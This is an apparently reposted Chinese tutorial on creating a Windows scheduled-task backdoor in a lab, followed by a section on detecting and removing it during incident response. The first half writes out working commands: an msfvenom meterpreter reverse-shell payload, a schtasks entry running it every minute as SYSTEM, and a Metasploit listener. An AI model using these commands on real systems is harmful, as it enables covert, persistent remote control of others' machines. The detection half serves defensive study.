admin 管理员组文章数量: 887019
一、Windows计划任务后门介绍
计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。
二、Windows计划任务后门-教程
前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限
靶机: windows Server2012
IP: 192.168.226.128
攻击机: kali
IP: 192.168.226.131
2.1 利用MSF生成一个EXE类型的后门木马
命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
2.2 创建计划任务
将生成的后门木马 wxiaoge.exe 上传到目标机内,然后在目标机内执行以下指令,创建一个wixoage计划任务,每一分钟执行一次wxiaoge.exe。
schtasks /create /tn wxiaoge /sc minute /mo 1 /tr C:\Users\Administrator\Desktop\wxiaoge.exe /ru system /f
#schtasks命令详解:https://wwwblogs/daimaxuejia/p/12957644.html
查看计划任务成功创建,如下图所示:
2.3 监听返回的shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 8888
exploit
过一分钟之后接接收到靶机反弹回来的shell,权限维持成功
三、Windows计划任务后门——应急响应发现
3.1 使用TCPView查看网络连接
因为每一分钟或者几分钟定时任务才会执行一次,使用 netstat -ano命令查看的话,只会查看当前时间的网络连接状态,时间把握不准的话不一定可以查看到程序异常连接,因此使用TCPView
TCPView运行后可显示本机内存中执行的所有进程名、协议名称、本地地址+端口号、远程地址+端口号及它的状态,非常方便
在windows server 2012上打开TCPView,如下图所示,有一个红色的名字为wxiaoge.exe的进程,其远程地址是192.168.226.131:8888,PID是1468
通过PID号查找该进程文件所在的位置
wmic process get name,executablepath,processid|findstr 1468
找到文件位置在 C:\Users\Administrator\Desktop\wxiaoge.exe
之后将 wxiaoge.exe 异常程序使用微步云沙箱检测是后门木马
但是 TCPView 流量检测过程中,wxiaoge.exe程序一会儿红色一会儿绿色,像每个一分钟或者几分钟执行一次wxiaoge.exe程序,推测可能存在定时任务
3.2 查看定时任务
通过 管理工具-》任务计划程序 查看服务器的定时任务,发现有一个名字为 wxiaoge的定时任务,每隔一分钟执行一次C:\Users\Administrator\Desktop\wxiaoge.exe文件,其创建者是Administrator,说明攻击者已经获取超级管理员权限。
处置:
1、删除C:\Users\Administrator\Desktop\wxiaoge.exe文件
2、删除wxiaoge定时任务
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
版权声明:本文标题:Windows留后门--教程(二)——Windows计划任务后门 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727102658h1068266.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论